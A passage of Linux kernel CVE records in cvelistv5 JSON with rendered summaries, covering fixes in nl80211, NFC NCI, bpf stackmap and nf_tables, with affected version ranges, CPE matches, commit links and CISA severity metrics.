"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: nl80211: don\u0027t free NULL coalescing rule\n\nIf the parsing fails, we can dereference a NULL pointer here."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:31.170Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/327382dc0f16b268950b96e0052595efd80f7b0a"
},
{
"url": "https://git.kernel.org/stable/c/97792d0611ae2e6fe3ccefb0a94a1d802317c457"
},
{
"url": "https://git.kernel.org/stable/c/5a730a161ac2290d46d49be76b2b1aee8d2eb307"
},
{
"url": "https://git.kernel.org/stable/c/ad12c74e953b68ad85c78adc6408ed8435c64af4"
},
{
"url": "https://git.kernel.org/stable/c/b0db4caa10f2e4e811cf88744fbf0d074b67ec1f"
},
{
"url": "https://git.kernel.org/stable/c/244822c09b4f9aedfb5977f03c0deeb39da8ec7d"
},
{
"url": "https://git.kernel.org/stable/c/f92772a642485394db5c9a17bd0ee73fc6902383"
},
{
"url": "https://git.kernel.org/stable/c/801ea33ae82d6a9d954074fbcf8ea9d18f1543a7"
}
],
"title": "wifi: nl80211: don\u0027t free NULL coalescing rule",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36941",
"datePublished": "2024-05-30T15:29:28.687Z",
"dateReserved": "2024-05-30T15:25:07.072Z",
"dateUpdated": "2025-05-20T14:17:10.233Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26825 (GCVE-0-2024-26825)
Vulnerability from cvelistv5
Published
2024-04-17 09:43
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: free rx_data_reassembly skb on NCI device cleanup
rx_data_reassembly skb is stored during NCI data exchange for processing
fragmented packets. It is dropped only when the last fragment is processed
or when an NTF packet with NCI_OP_RF_DEACTIVATE_NTF opcode is received.
However, the NCI device may be deallocated before that which leads to skb
leak.
As by design the rx_data_reassembly skb is bound to the NCI device and
nothing prevents the device to be freed before the skb is processed in
some way and cleaned, free it on the NCI device cleanup.
Found by Linux Verification Center (linuxtesting.org) with Syzkaller.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 Version: 6a2968aaf50c7a22fced77a5e24aa636281efca8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26825",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:41:44.795216Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:48:52.594Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.587Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e9a8498658b398bf11b8e388005fa54e40aed81"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/71349abe3aba7fedcab5b3fcd7aa82371fb5ccbf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f6d16f0520d6505241629ee2f5c131b547d5f9d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/471c9ede8061357b43a116fa692e70d91941ac23"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5c0c5ffaed73cbae6c317374dc32ba6cacc60895"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/16d3f507b0fa70453dc54550df093d6e9ac630c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a3d90fb5c23f29ba59c04005ae76c5228cef2be9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfb007aebe6bff451f7f3a4be19f4f286d0d5d9c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/nfc/nci/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7e9a8498658b398bf11b8e388005fa54e40aed81",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "71349abe3aba7fedcab5b3fcd7aa82371fb5ccbf",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "2f6d16f0520d6505241629ee2f5c131b547d5f9d",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "471c9ede8061357b43a116fa692e70d91941ac23",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "5c0c5ffaed73cbae6c317374dc32ba6cacc60895",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "16d3f507b0fa70453dc54550df093d6e9ac630c1",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "a3d90fb5c23f29ba59c04005ae76c5228cef2be9",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
},
{
"lessThan": "bfb007aebe6bff451f7f3a4be19f4f286d0d5d9c",
"status": "affected",
"version": "6a2968aaf50c7a22fced77a5e24aa636281efca8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/nfc/nci/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.2"
},
{
"lessThan": "3.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "3.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc: nci: free rx_data_reassembly skb on NCI device cleanup\n\nrx_data_reassembly skb is stored during NCI data exchange for processing\nfragmented packets. It is dropped only when the last fragment is processed\nor when an NTF packet with NCI_OP_RF_DEACTIVATE_NTF opcode is received.\nHowever, the NCI device may be deallocated before that which leads to skb\nleak.\n\nAs by design the rx_data_reassembly skb is bound to the NCI device and\nnothing prevents the device to be freed before the skb is processed in\nsome way and cleaned, free it on the NCI device cleanup.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:22.904Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7e9a8498658b398bf11b8e388005fa54e40aed81"
},
{
"url": "https://git.kernel.org/stable/c/71349abe3aba7fedcab5b3fcd7aa82371fb5ccbf"
},
{
"url": "https://git.kernel.org/stable/c/2f6d16f0520d6505241629ee2f5c131b547d5f9d"
},
{
"url": "https://git.kernel.org/stable/c/471c9ede8061357b43a116fa692e70d91941ac23"
},
{
"url": "https://git.kernel.org/stable/c/5c0c5ffaed73cbae6c317374dc32ba6cacc60895"
},
{
"url": "https://git.kernel.org/stable/c/16d3f507b0fa70453dc54550df093d6e9ac630c1"
},
{
"url": "https://git.kernel.org/stable/c/a3d90fb5c23f29ba59c04005ae76c5228cef2be9"
},
{
"url": "https://git.kernel.org/stable/c/bfb007aebe6bff451f7f3a4be19f4f286d0d5d9c"
}
],
"title": "nfc: nci: free rx_data_reassembly skb on NCI device cleanup",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26825",
"datePublished": "2024-04-17T09:43:51.114Z",
"dateReserved": "2024-02-19T14:20:24.181Z",
"dateUpdated": "2025-05-04T08:57:22.904Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26883 (GCVE-0-2024-26883)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix stackmap overflow check on 32-bit arches
The stackmap code relies on roundup_pow_of_two() to compute the number
of hash buckets, and contains an overflow check by checking if the
resulting value is 0. However, on 32-bit arches, the roundup code itself
can overflow by doing a 32-bit left-shift of an unsigned long value,
which is undefined behaviour, so it is not guaranteed to truncate
neatly. This was triggered by syzbot on the DEVMAP_HASH type, which
contains the same check, copied from the hashtab code.
The commit in the fixes tag actually attempted to fix this, but the fix
did not account for the UB, so the fix only works on CPUs where an
overflow does result in a neat truncation to zero, which is not
guaranteed. Checking the value before rounding does not have this
problem.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 063c722dd9d285d877e6fd499e753d6224f4c046 Version: 7e3a6b820535eb395784060ae26c5af579528fa0 Version: 8032bf2af9ce26b3a362b9711d15f626ab946a74 Version: 6183f4d3a0a2ad230511987c6c362ca43ec0055f Version: 6183f4d3a0a2ad230511987c6c362ca43ec0055f Version: 6183f4d3a0a2ad230511987c6c362ca43ec0055f Version: 6183f4d3a0a2ad230511987c6c362ca43ec0055f Version: 6183f4d3a0a2ad230511987c6c362ca43ec0055f Version: 6183f4d3a0a2ad230511987c6c362ca43ec0055f Version: 253150830a012adfccf90afcebae8fda5b05a80f Version: 766107351731ae223ebf60ca22bdfeb47ce6acc8 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.381Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0e214acc59145ce25113f617311aa79dda39cb3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21e5fa4688e1a4d3db6b72216231b24232f75c1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/15641007df0f0d35fa28742b25c2a7db9dcd6895"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca1f06e72dec41ae4f76e7b1a8a97265447b46ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f06899582ccee09bd85d0696290e3eaca9aa042d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7070b274c7866a4c5036f8d54fcaf315c64ac33a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43f798b9036491fb014b55dd61c4c5c3193267d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0971126c8164abe2004b8536b49690a0d6005b0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a4b21250bf79eef26543d35bd390448646c536b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26883",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:22.381696Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:25.228Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/stackmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d0e214acc59145ce25113f617311aa79dda39cb3",
"status": "affected",
"version": "063c722dd9d285d877e6fd499e753d6224f4c046",
"versionType": "git"
},
{
"lessThan": "21e5fa4688e1a4d3db6b72216231b24232f75c1d",
"status": "affected",
"version": "7e3a6b820535eb395784060ae26c5af579528fa0",
"versionType": "git"
},
{
"lessThan": "15641007df0f0d35fa28742b25c2a7db9dcd6895",
"status": "affected",
"version": "8032bf2af9ce26b3a362b9711d15f626ab946a74",
"versionType": "git"
},
{
"lessThan": "ca1f06e72dec41ae4f76e7b1a8a97265447b46ae",
"status": "affected",
"version": "6183f4d3a0a2ad230511987c6c362ca43ec0055f",
"versionType": "git"
},
{
"lessThan": "f06899582ccee09bd85d0696290e3eaca9aa042d",
"status": "affected",
"version": "6183f4d3a0a2ad230511987c6c362ca43ec0055f",
"versionType": "git"
},
{
"lessThan": "7070b274c7866a4c5036f8d54fcaf315c64ac33a",
"status": "affected",
"version": "6183f4d3a0a2ad230511987c6c362ca43ec0055f",
"versionType": "git"
},
{
"lessThan": "43f798b9036491fb014b55dd61c4c5c3193267d0",
"status": "affected",
"version": "6183f4d3a0a2ad230511987c6c362ca43ec0055f",
"versionType": "git"
},
{
"lessThan": "0971126c8164abe2004b8536b49690a0d6005b0a",
"status": "affected",
"version": "6183f4d3a0a2ad230511987c6c362ca43ec0055f",
"versionType": "git"
},
{
"lessThan": "7a4b21250bf79eef26543d35bd390448646c536b",
"status": "affected",
"version": "6183f4d3a0a2ad230511987c6c362ca43ec0055f",
"versionType": "git"
},
{
"status": "affected",
"version": "253150830a012adfccf90afcebae8fda5b05a80f",
"versionType": "git"
},
{
"status": "affected",
"version": "766107351731ae223ebf60ca22bdfeb47ce6acc8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/stackmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.11"
},
{
"lessThan": "5.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.19.177",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.4.99",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.10.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.258",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.222",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix stackmap overflow check on 32-bit arches\n\nThe stackmap code relies on roundup_pow_of_two() to compute the number\nof hash buckets, and contains an overflow check by checking if the\nresulting value is 0. However, on 32-bit arches, the roundup code itself\ncan overflow by doing a 32-bit left-shift of an unsigned long value,\nwhich is undefined behaviour, so it is not guaranteed to truncate\nneatly. This was triggered by syzbot on the DEVMAP_HASH type, which\ncontains the same check, copied from the hashtab code.\n\nThe commit in the fixes tag actually attempted to fix this, but the fix\ndid not account for the UB, so the fix only works on CPUs where an\noverflow does result in a neat truncation to zero, which is not\nguaranteed. Checking the value before rounding does not have this\nproblem."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:01.991Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d0e214acc59145ce25113f617311aa79dda39cb3"
},
{
"url": "https://git.kernel.org/stable/c/21e5fa4688e1a4d3db6b72216231b24232f75c1d"
},
{
"url": "https://git.kernel.org/stable/c/15641007df0f0d35fa28742b25c2a7db9dcd6895"
},
{
"url": "https://git.kernel.org/stable/c/ca1f06e72dec41ae4f76e7b1a8a97265447b46ae"
},
{
"url": "https://git.kernel.org/stable/c/f06899582ccee09bd85d0696290e3eaca9aa042d"
},
{
"url": "https://git.kernel.org/stable/c/7070b274c7866a4c5036f8d54fcaf315c64ac33a"
},
{
"url": "https://git.kernel.org/stable/c/43f798b9036491fb014b55dd61c4c5c3193267d0"
},
{
"url": "https://git.kernel.org/stable/c/0971126c8164abe2004b8536b49690a0d6005b0a"
},
{
"url": "https://git.kernel.org/stable/c/7a4b21250bf79eef26543d35bd390448646c536b"
}
],
"title": "bpf: Fix stackmap overflow check on 32-bit arches",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26883",
"datePublished": "2024-04-17T10:27:39.036Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T12:55:01.991Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35897 (GCVE-0-2024-35897)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: discard table flag update with pending basechain deletion
Hook unregistration is deferred to the commit phase, same occurs with
hook updates triggered by the table dormant flag. When both commands are
combined, this results in deleting a basechain while leaving its hook
still registered in the core.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3 Version: e10f661adc556c4969c70ddaddf238bffdaf1e87 Version: d9c4da8cb74e8ee6e58a064a3573aa37acf6c935 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.782Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e75faf01e22ec7dc671640fa0e0968964fafd2fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a3b90904d8a072287480eed4c3ece4b99d64f78"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b58d0ac35f6d75ec1db8650a29dfd6f292c11362"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6cbbe1ba76ee7e674a86abd43009b083a45838cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2aeb805a1bcd5f27c8c0d1a9d4d653f16d1506f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9627fd0c6ea1c446741a33e67bc5709c59923827"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f609f630951b624348373cef99991ce08831927"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1bc83a019bbe268be3526406245ec28c2458a518"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35897",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:41:11.412085Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:16.369Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e75faf01e22ec7dc671640fa0e0968964fafd2fc",
"status": "affected",
"version": "bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3",
"versionType": "git"
},
{
"lessThan": "9a3b90904d8a072287480eed4c3ece4b99d64f78",
"status": "affected",
"version": "e10f661adc556c4969c70ddaddf238bffdaf1e87",
"versionType": "git"
},
{
"lessThan": "b58d0ac35f6d75ec1db8650a29dfd6f292c11362",
"status": "affected",
"version": "d9c4da8cb74e8ee6e58a064a3573aa37acf6c935",
"versionType": "git"
},
{
"lessThan": "6cbbe1ba76ee7e674a86abd43009b083a45838cb",
"status": "affected",
